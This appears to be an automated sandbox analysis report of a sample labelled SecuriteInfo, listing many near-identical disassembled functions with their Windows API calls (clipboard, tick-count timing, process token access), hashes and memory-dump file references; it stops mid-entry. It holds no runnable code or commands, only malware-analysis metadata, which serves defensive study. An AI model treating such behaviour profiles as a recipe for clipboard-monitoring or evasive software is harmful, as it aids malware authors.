Instruction ID: c769ef2e5eae5bdc0b3c5e22225ce5806a87de8fe8437de9a6dfe8d20805da9f
Opcode Fuzzy Hash: 9be0545cde4605745e132e89f1facee40eeca3bea8bf805dc2d0705345c6e66f
Instruction Fuzzy Hash: AE915E32205B4486EB6B8B27E8847EA77A1F74DBE4F540116EB99476F5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036ACD Relevance: 9.2, APIs: 6, Instructions: 177windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014004C3F0: SendMessageTimeoutW.USER32 ref: 000000014004C46E

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$Message$ClipboardCloseGlobalPeekSendTimeoutUnlock
String ID:
API String ID: 3716859204-0
Opcode ID: 7ef21aaaeb454ee52084bf92492f88a20e6fe760a6f01d2d50cbfc0f3d052cec
Instruction ID: 88f7d78aadb923b4d6be44c9b529ad26884502b1aaa4a8869d3f1e6c7fe2120d
Opcode Fuzzy Hash: 7ef21aaaeb454ee52084bf92492f88a20e6fe760a6f01d2d50cbfc0f3d052cec
Instruction Fuzzy Hash: 15915E32205B4486EB6B8B27E8847EA77A1F74DBE4F540116EB59476F5DB38C881C701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036D76 Relevance: 9.2, APIs: 6, Instructions: 177windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 64ac17412817026bfa0974e780d473e63c19e2a4acd0042bc1f61725fbac4c34
Instruction ID: d4e88717b341ad9d8e199baa761c5f34449bb6a2db92342ebb626624c5e6f89b
Opcode Fuzzy Hash: 64ac17412817026bfa0974e780d473e63c19e2a4acd0042bc1f61725fbac4c34
Instruction Fuzzy Hash: 27915E32205B4486EB6B8B27E8847EA77A1F74DBE4F540116EB59476F5DB38C881C701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036EB6 Relevance: 9.2, APIs: 6, Instructions: 177windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: be01154e12bb5635379d48f75fea89ea67b430e301c50c1a8e5cd05e22b4f1bd
Instruction ID: 1e38a499b9459440591ac8d8bc60cc13346e9086e9c20e4a58d2abd7e5e3b263
Opcode Fuzzy Hash: be01154e12bb5635379d48f75fea89ea67b430e301c50c1a8e5cd05e22b4f1bd
Instruction Fuzzy Hash: 3F915F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB99876F5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037727 Relevance: 9.2, APIs: 6, Instructions: 177windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 528e31951e3b27f77996f7c39af8d71633a339ae42b57ecba2aa6032330692b8
Instruction ID: 90cb4aade0007d2a39e152b61e05abf912dc238912e12b3d1f3ce98e8fd92c8c
Opcode Fuzzy Hash: 528e31951e3b27f77996f7c39af8d71633a339ae42b57ecba2aa6032330692b8
Instruction Fuzzy Hash: 07916032205B4486FB6B8B27E8947EA37A1F74DBE4F540116EB5987AF5DB38C881C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003872E Relevance: 9.2, APIs: 6, Instructions: 176windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400A9870: GetFullPathNameW.KERNEL32(?,0000000140038759), ref: 00000001400A98A6
Part of subcall function 00000001400A9870: WritePrivateProfileStringW.KERNEL32 ref: 00000001400A98BA
Part of subcall function 00000001400A9870: WritePrivateProfileStringW.KERNEL32 ref: 00000001400A98CE

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$PrivateProfileStringWrite$ClipboardCloseFullGlobalMessageNamePathPeekUnlock
String ID:
API String ID: 2214806735-0
Opcode ID: 309b41fd0f49a5f18f56abe7de1c515d24bcfcfaac0fde23f8ea8492b6808f7f
Instruction ID: c03436e8e5bc40df0d544d0fa8375dfc551873bb583fce9496a1825874fcc882
Opcode Fuzzy Hash: 309b41fd0f49a5f18f56abe7de1c515d24bcfcfaac0fde23f8ea8492b6808f7f
Instruction Fuzzy Hash: 63916F32605B4486FB6B8B27E8847EA37A1F74DBE4F540116EB59876F5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140038A13 Relevance: 9.2, APIs: 6, Instructions: 176windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140081CD0: GetCurrentProcess.KERNEL32 ref: 0000000140081CD8
Part of subcall function 0000000140081CD0: OpenProcessToken.ADVAPI32 ref: 0000000140081CEB

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$Process$ClipboardCloseCurrentGlobalMessageOpenPeekTokenUnlock
String ID:
API String ID: 3060718303-0
Opcode ID: 848a3229468586fec22aa0cf3ebf8089857f8f405d8fd0d5038953560c237e30
Instruction ID: 469510dc309124e955e0fe19427dbde50ddb73a3a9f0cea0effc1b3257978fac
Opcode Fuzzy Hash: 848a3229468586fec22aa0cf3ebf8089857f8f405d8fd0d5038953560c237e30
Instruction Fuzzy Hash: BE816F32605B4086FB6B8B27E8947EA37A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036CB5 Relevance: 9.2, APIs: 6, Instructions: 176windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014004F4B0: SetWindowTextW.USER32 ref: 000000014004F4D4

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekTextUnlockWindow
String ID:
API String ID: 189804293-0
Opcode ID: 73b0f37b6f02e5afe8cf56d241888f1de2d3c366cb277924af796cbc806a7a94
Instruction ID: 5c9ab4fa1ada3b629af92bddda735ecfb390ff590042bd17f99f036ad09e324d
Opcode Fuzzy Hash: 73b0f37b6f02e5afe8cf56d241888f1de2d3c366cb277924af796cbc806a7a94
Instruction Fuzzy Hash: D8915F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB99876F5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037512 Relevance: 9.2, APIs: 6, Instructions: 176windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: ca2d6519b11996094eb62fafde7eae2de2630e304b99d0ec4b61303dbb7a32d7
Instruction ID: c1c7a490ba5936da000e8cbc65d05fd6543ed9651093724fdbb22e94161e3dc1
Opcode Fuzzy Hash: ca2d6519b11996094eb62fafde7eae2de2630e304b99d0ec4b61303dbb7a32d7
Instruction Fuzzy Hash: 17915F32605B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003840E Relevance: 9.2, APIs: 6, Instructions: 175windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 915cc80121fb8e8460731fb8beda464cf53dc51fd9e1e9c32a33dd49a41f961c
Instruction ID: f888a90c12bb08413379ae0879264dd92507e0756705a6b2cf353b325c48ec5c
Opcode Fuzzy Hash: 915cc80121fb8e8460731fb8beda464cf53dc51fd9e1e9c32a33dd49a41f961c
Instruction Fuzzy Hash: FC916132205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB59876F5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140038700 Relevance: 9.2, APIs: 6, Instructions: 175windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400A9720: GetFullPathNameW.KERNEL32(?,0000000140038729), ref: 00000001400A976C
Part of subcall function 00000001400A9720: WritePrivateProfileStringW.KERNEL32 ref: 00000001400A979F
Part of subcall function 00000001400A9720: WritePrivateProfileStringW.KERNEL32 ref: 00000001400A982C

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$PrivateProfileStringWrite$ClipboardCloseFullGlobalMessageNamePathPeekUnlock
String ID:
API String ID: 2214806735-0
Opcode ID: 966e0993e251eaab8a761ad261f35bb8740b10a1c5128658e6b7ccaa778617d1
Instruction ID: 2e3052dcf0d27e37a79f89631188c073dc4a74c26fbb69354124884f2251c6f8
Opcode Fuzzy Hash: 966e0993e251eaab8a761ad261f35bb8740b10a1c5128658e6b7ccaa778617d1
Instruction Fuzzy Hash: 86915032205B4486FB6B8B27E8847EA77A1F74DBE4F540116EB59476F5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036A1F Relevance: 9.2, APIs: 6, Instructions: 175windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014004B4F0: GetWindowThreadProcessId.USER32 ref: 000000014004B54D
Part of subcall function 000000014004B4F0: GetGUIThreadInfo.USER32 ref: 000000014004B55A
Part of subcall function 000000014004B4F0: GetClassNameW.USER32 ref: 000000014004B58D
Part of subcall function 000000014004B4F0: EnumChildWindows.USER32 ref: 000000014004B5B7

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$Thread$ChildClassClipboardCloseEnumGlobalInfoMessageNamePeekProcessUnlockWindowWindows
String ID:
API String ID: 3620957724-0
Opcode ID: e525d7bbc95ee876222f247fdba3ef16b200ad652669fde492669ba196d2d857
Instruction ID: 930ed0c1023b11d10ec1070840b1e9e8afdbedf06dc6275164a1791bf2e5dcf2
Opcode Fuzzy Hash: e525d7bbc95ee876222f247fdba3ef16b200ad652669fde492669ba196d2d857
Instruction Fuzzy Hash: D4916F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036BAB Relevance: 9.2, APIs: 6, Instructions: 175windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 5521f8c73ab6f687f7b364934b9123e8d0ba7e589e2c8c33a0d0d7c8b35b713f
Instruction ID: fa76f1e41b59f4f5085c3995a3b95319f6da1b80c2ab1a12f110fa25c5c79e04
Opcode Fuzzy Hash: 5521f8c73ab6f687f7b364934b9123e8d0ba7e589e2c8c33a0d0d7c8b35b713f
Instruction Fuzzy Hash: 2B916F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C741

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036DB0 Relevance: 9.2, APIs: 6, Instructions: 175windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 691aa5881b52be05bfc7c6dd34b27711e293c7c04838bb49bd9c39510eea3f31
Instruction ID: 0330c350dcb3370d79b30587a84c475e003a728f4b72bf3e8d139f0c63bc47ac
Opcode Fuzzy Hash: 691aa5881b52be05bfc7c6dd34b27711e293c7c04838bb49bd9c39510eea3f31
Instruction Fuzzy Hash: 2C916F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036DDE Relevance: 9.2, APIs: 6, Instructions: 175windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140051EE0: GetWindowRect.USER32 ref: 0000000140051F66

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
